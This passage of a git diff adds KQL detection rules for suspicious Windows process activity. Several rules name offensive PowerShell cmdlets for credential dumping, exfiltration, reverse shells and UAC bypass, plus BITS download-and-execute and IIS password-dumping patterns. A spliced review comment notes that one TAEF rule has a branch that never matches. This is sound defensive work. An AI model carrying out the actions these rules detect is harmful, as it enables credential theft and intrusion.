"AEcAZQB0AEMAaAB1AG4Aaw" or ProcessCommandLine contains "LgBHAGUAdABDAGgAdQBuAGsA" or ProcessCommandLine contains "LkdldENodW5r" or ProcessCommandLine contains "R2V0Q2h1bm" or ProcessCommandLine contains "AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A" or ProcessCommandLine contains "QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA" or ProcessCommandLine contains "RIUkVBRF9JTkZPNj" or ProcessCommandLine contains "SFJFQURfSU5GTzY0" or ProcessCommandLine contains "VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA" or ProcessCommandLine contains "VEhSRUFEX0lORk82N" or ProcessCommandLine contains "AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA" or ProcessCommandLine contains "cmVhdGVSZW1vdGVUaHJlYW" or ProcessCommandLine contains "MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA" or ProcessCommandLine contains "NyZWF0ZVJlbW90ZVRocmVhZ" or ProcessCommandLine contains "Q3JlYXRlUmVtb3RlVGhyZWFk" or ProcessCommandLine contains "QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA" or ProcessCommandLine contains "0AZQBtAG0AbwB2AGUA" or ProcessCommandLine contains "1lbW1vdm" or ProcessCommandLine contains "AGUAbQBtAG8AdgBlA" or ProcessCommandLine contains "bQBlAG0AbQBvAHYAZQ" or ProcessCommandLine contains "bWVtbW92Z" or ProcessCommandLine contains "ZW1tb3Zl") and ProcessCommandLine contains " hidden " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql b/KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
new file mode 100644
index 00000000..163b5085
--- /dev/null
+++ b/KQL/rules/windows/process_creation/malicious_pe_execution_by_microsoft_visual_studio_debugger.kql
@@ -0,0 +1,14 @@
+// Title: Malicious PE Execution by Microsoft Visual Studio Debugger
+// Author: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
+// Date: 2020-10-14
+// Level: medium
+// Description: There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
+// This option may be used adversaries to execute malicious code by signed verified binary.
+// The debugger is installed alongside with Microsoft Visual Studio package.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1218, attack.defense-evasion
+// False Positives:
+// - The process spawned by vsjitdebugger.exe is uncommon.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\vsjitdebugger.exe" and (not(((FolderPath contains "\\vsimmersiveactivatehelper" and FolderPath contains ".exe") or FolderPath endswith "\\devenv.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql
new file mode 100644
index 00000000..93509013
--- /dev/null
+++ b/KQL/rules/windows/process_creation/malicious_powershell_commandlets_processcreation.kql
@@ -0,0 +1,10 @@
+// Title: Malicious PowerShell Commandlets - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: high
+// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or 
ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or 
ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DNSExfiltrator" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or 
ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerDPAPI" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains "Invoke-Shellcode" or ProcessCommandLine contains "Invoke-SMBScanner" or ProcessCommandLine contains "Invoke-Snaffler" or ProcessCommandLine contains "Invoke-Spoolsample" or ProcessCommandLine contains "Invoke-SpraySinglePassword" or ProcessCommandLine contains "Invoke-SSHCommand" or ProcessCommandLine 
contains "Invoke-StandIn" or ProcessCommandLine contains "Invoke-StickyNotesExtract" or ProcessCommandLine contains "Invoke-SystemCommand" or ProcessCommandLine contains "Invoke-Tasksbackdoor" or ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains "Invoke-Thunderfox" or ProcessCommandLine contains "Invoke-ThunderStruck" or ProcessCommandLine contains "Invoke-TokenManipulation" or ProcessCommandLine contains "Invoke-Tokenvator" or ProcessCommandLine contains "Invoke-TotalExec" or ProcessCommandLine contains "Invoke-UrbanBishop" or ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-VoiceTroll" or ProcessCommandLine contains "Invoke-Whisker" or ProcessCommandLine contains "Invoke-WinEnum" or ProcessCommandLine contains "Invoke-winPEAS" or ProcessCommandLine contains "Invoke-WireTap" or ProcessCommandLine contains "Invoke-WmiCommand" or ProcessCommandLine contains "Invoke-WMIExec" or ProcessCommandLine contains "Invoke-WScriptBypassUAC" or ProcessCommandLine contains "Invoke-Zerologon" or ProcessCommandLine contains "MailRaider" or ProcessCommandLine contains "New-ADIDNSNode" or ProcessCommandLine contains "New-DNSRecordArray" or ProcessCommandLine contains "New-HoneyHash" or ProcessCommandLine contains "New-InMemoryModule" or ProcessCommandLine contains "New-MachineAccount" or ProcessCommandLine contains "New-SOASerialNumberArray" or ProcessCommandLine contains "Out-Minidump" or ProcessCommandLine contains "Port-Scan" or ProcessCommandLine contains "PowerBreach" or ProcessCommandLine contains "powercat " or ProcessCommandLine contains "PowerUp" or ProcessCommandLine contains "PowerView" or ProcessCommandLine contains "Remove-ADIDNSNode" or ProcessCommandLine contains "Remove-MachineAccount" or ProcessCommandLine contains "Remove-Update" or ProcessCommandLine contains "Rename-ADIDNSNode" or ProcessCommandLine contains "Revoke-ADIDNSPermission" or ProcessCommandLine contains "Set-ADIDNSNode" or ProcessCommandLine 
contains "Set-MacAttribute" or ProcessCommandLine contains "Set-MachineAccountAttribute" or ProcessCommandLine contains "Set-Wallpaper" or ProcessCommandLine contains "Show-TargetScreen" or ProcessCommandLine contains "Start-CaptureServer" or ProcessCommandLine contains "Start-Dnscat2" or ProcessCommandLine contains "Start-WebcamRecorder" or ProcessCommandLine contains "Veeam-Get-Creds" or ProcessCommandLine contains "VolumeShadowCopyTools"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql b/KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql
new file mode 100644
index 00000000..d8c763af
--- /dev/null
+++ b/KQL/rules/windows/process_creation/malicious_windows_script_components_file_execution_by_taef_detection.kql
@@ -0,0 +1,13 @@
+// Title: Malicious Windows Script Components File Execution by TAEF Detection
+// Author: Agro (@agro_sev) oscd.community
+// Date: 2020-10-13
+// Level: low
+// Description: Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
+// Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - It's not an uncommon to use te.exe directly to execute legal TAEF tests
+
+DeviceProcessEvents
+| where FolderPath endswith "\\te.exe" or InitiatingProcessFolderPath endswith "\\te.exe" or ProcessVersionInfoOriginalFileName =~ "\\te.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql b/KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql
new file mode 100644
index 00000000..a8f212f6
--- /dev/null
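Review bot: The third alternative on the TAEF rule's `| where` line, `ProcessVersionInfoOriginalFileName =~ "\\te.exe"`, is an exact (case-insensitive) equality against a string with a leading backslash, and that column carries the bare file name from the PE version resource — the sibling rules in this commit compare it to values such as `"mshta.exe"` and `"reg.exe"` with no separator — so this branch can never match. The rule still fires through the two `endswith` branches, but whatever coverage the OriginalFileName check was presumably meant to add is silently lost. The fix is `ProcessVersionInfoOriginalFileName =~ "te.exe"`; since this file is produced by helper.py, the backslash presumably comes from the source rule and the correction belongs upstream or in the converter rather than in this generated output.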
+++ b/KQL/rules/windows/process_creation/mavinject_inject_dll_into_running_process.kql
@@ -0,0 +1,10 @@
+// Title: Mavinject Inject DLL Into Running Process
+// Author: frack113, Florian Roth
+// Date: 2021-07-12
+// Level: high
+// Description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055.001, attack.t1218.013
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /INJECTRUNNING " and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\AppVClient.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql b/KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql
new file mode 100644
index 00000000..8c413bbd
--- /dev/null
+++ b/KQL/rules/windows/process_creation/microsoft_iis_connection_strings_decryption.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft IIS Connection Strings Decryption
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-28
+// Level: high
+// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql b/KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql
new file mode 100644
index 00000000..3d4a95cf
--- /dev/null
+++ b/KQL/rules/windows/process_creation/microsoft_iis_service_account_password_dumped.kql
@@ -0,0 +1,10 @@
+// Title: Microsoft IIS Service Account Password Dumped
+// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea)
+// Date: 2022-11-08
+// Level: high
+// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mmc20_lateral_movement.kql b/KQL/rules/windows/process_creation/mmc20_lateral_movement.kql
new file mode 100644
index 00000000..bba62e68
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mmc20_lateral_movement.kql
@@ -0,0 +1,12 @@
+// Title: MMC20 Lateral Movement
+// Author: @2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)
+// Date: 2020-03-04
+// Level: high
+// Description: Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1021.003
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-Embedding" and FolderPath endswith "\\mmc.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql b/KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
new file mode 100644
index 00000000..ee4ffaf4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mmc_executing_files_with_reversed_extensions_using_rtlo_abuse.kql
@@ -0,0 +1,13 @@
+// Title: MMC Executing Files with Reversed Extensions Using RTLO Abuse
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: high
+// Description: Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, attack.defense-evasion, attack.t1218.014, attack.t1036.002
+// False Positives:
+// - Legitimate administrative actions using MMC to execute misnamed `.msc` files.
+// - Unconventional but non-malicious usage of RLO or reversed extensions.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cod.msc" or ProcessCommandLine contains "fdp.msc" or ProcessCommandLine contains "ftr.msc" or ProcessCommandLine contains "lmth.msc" or ProcessCommandLine contains "slx.msc" or ProcessCommandLine contains "tdo.msc" or ProcessCommandLine contains "xcod.msc" or ProcessCommandLine contains "xslx.msc" or ProcessCommandLine contains "xtpp.msc") and (FolderPath endswith "\\mmc.exe" or ProcessVersionInfoOriginalFileName =~ "MMC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql b/KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql
new file mode 100644
index 00000000..5d7b1685
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mmc_spawning_windows_shell.kql
@@ -0,0 +1,10 @@
+// Title: MMC Spawning Windows Shell
+// Author: Karneades, Swisscom CSIRT
+// Date: 2019-08-05
+// Level: high
+// Description: Detects a Windows command line executable started from MMC
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.003
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/modify_group_policy_settings.kql b/KQL/rules/windows/process_creation/modify_group_policy_settings.kql
new file mode 100644
index 00000000..98ca15ba
--- /dev/null
+++ b/KQL/rules/windows/process_creation/modify_group_policy_settings.kql
@@ -0,0 +1,12 @@
+// Title: Modify Group Policy Settings
+// Author: frack113
+// Date: 2022-08-19
+// Level: medium
+// Description: Detect malicious GPO modifications can be used to implement many other malicious behaviors.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1484.001
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "GroupPolicyRefreshTimeDC" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffsetDC" or ProcessCommandLine contains "GroupPolicyRefreshTime" or ProcessCommandLine contains "GroupPolicyRefreshTimeOffset" or ProcessCommandLine contains "EnableSmartScreen" or ProcessCommandLine contains "ShellSmartScreenLevel") and ProcessCommandLine contains "\\SOFTWARE\\Policies\\Microsoft\\Windows\\System" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql b/KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql
new file mode 100644
index 00000000..ca21e44d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/monitoring_for_persistence_via_bits.kql
@@ -0,0 +1,13 @@
+// Title: Monitoring For Persistence Via BITS
+// Author: Sreeman
+// Date: 2020-10-29
+// Level: medium
+// Description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.
+// When the job runs on the system the command specified in the BITS job will be executed.
+// This can be abused by actors to create a backdoor within the system and for persistence.
+// It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1197
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and ((ProcessCommandLine contains "/SetNotifyCmdLine" and (ProcessCommandLine contains "%COMSPEC%" or ProcessCommandLine contains "cmd.exe" or ProcessCommandLine contains "regsvr32.exe")) or (ProcessCommandLine contains "/Addfile" and (ProcessCommandLine contains "http:" or ProcessCommandLine contains "https:" or ProcessCommandLine contains "ftp:" or ProcessCommandLine contains "ftps:")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql b/KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql
new file mode 100644
index 00000000..7110ffa0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msdt_execution_via_answer_file.kql
@@ -0,0 +1,12 @@
+// Title: MSDT Execution Via Answer File
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-13
+// Level: high
+// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab).
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+// - Possible undocumented parents of "msdt" other than "pcwrun".
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ") and FolderPath endswith "\\msdt.exe") and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql b/KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql
new file mode 100644
index 00000000..d9a412f5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msexchange_transport_agent_installation.kql
@@ -0,0 +1,12 @@
+// Title: MSExchange Transport Agent Installation
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2021-06-08
+// Level: medium
+// Description: Detects the Installation of a Exchange Transport Agent
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1505.002
+// False Positives:
+// - Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Install-TransportAgent"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql b/KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql
new file mode 100644
index 00000000..1241c065
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mshta_execution_with_suspicious_file_extensions.kql
@@ -0,0 +1,15 @@
+// Title: MSHTA Execution with Suspicious File Extensions
+// Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-02-22
+// Level: high
+// Description: Detects execution of mshta.exe with file types that looks like they do not typically represent HTA (HTML Application) content,
+// such as .png, .jpg, .zip, .pdf, and others, which are often polyglots. MSHTA is a legitimate Windows utility for executing HTML Applications
+// containing VBScript or JScript. Threat actors often abuse this lolbin utility to download and
+// execute malicious scripts disguised as benign files or hosted under misleading extensions to evade detection.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140, attack.t1218.005, attack.execution, attack.t1059.007, cve.2020-1599
+// False Positives:
+// - False positives depend on scripts and administrative tools used in the monitored environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".avi" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".bmp" or ProcessCommandLine contains ".conf" or ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".gz" or ProcessCommandLine contains ".ini" or ProcessCommandLine contains ".jpe" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".json" or ProcessCommandLine contains ".lnk" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".mkv" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".mp4" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".rtf" or ProcessCommandLine contains ".svg" or 
ProcessCommandLine contains ".tar" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml" or ProcessCommandLine contains ".yaml" or ProcessCommandLine contains ".yml" or ProcessCommandLine contains ".zip" or ProcessCommandLine contains "vbscript") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "mshta.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql b/KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql
new file mode 100644
index 00000000..ad203736
--- /dev/null
+++ b/KQL/rules/windows/process_creation/mshtml_dll_runhtmlapplication_suspicious_usage.kql
@@ -0,0 +1,12 @@
+// Title: Mshtml.DLL RunHTMLApplication Suspicious Usage
+// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
+// Date: 2022-08-14
+// Level: high
+// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/msiexec_quiet_installation.kql b/KQL/rules/windows/process_creation/msiexec_quiet_installation.kql
new file mode 100644
index 00000000..d78d366c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/msiexec_quiet_installation.kql
@@ -0,0 +1,13 @@
+// Title: Msiexec Quiet Installation
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
+// Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
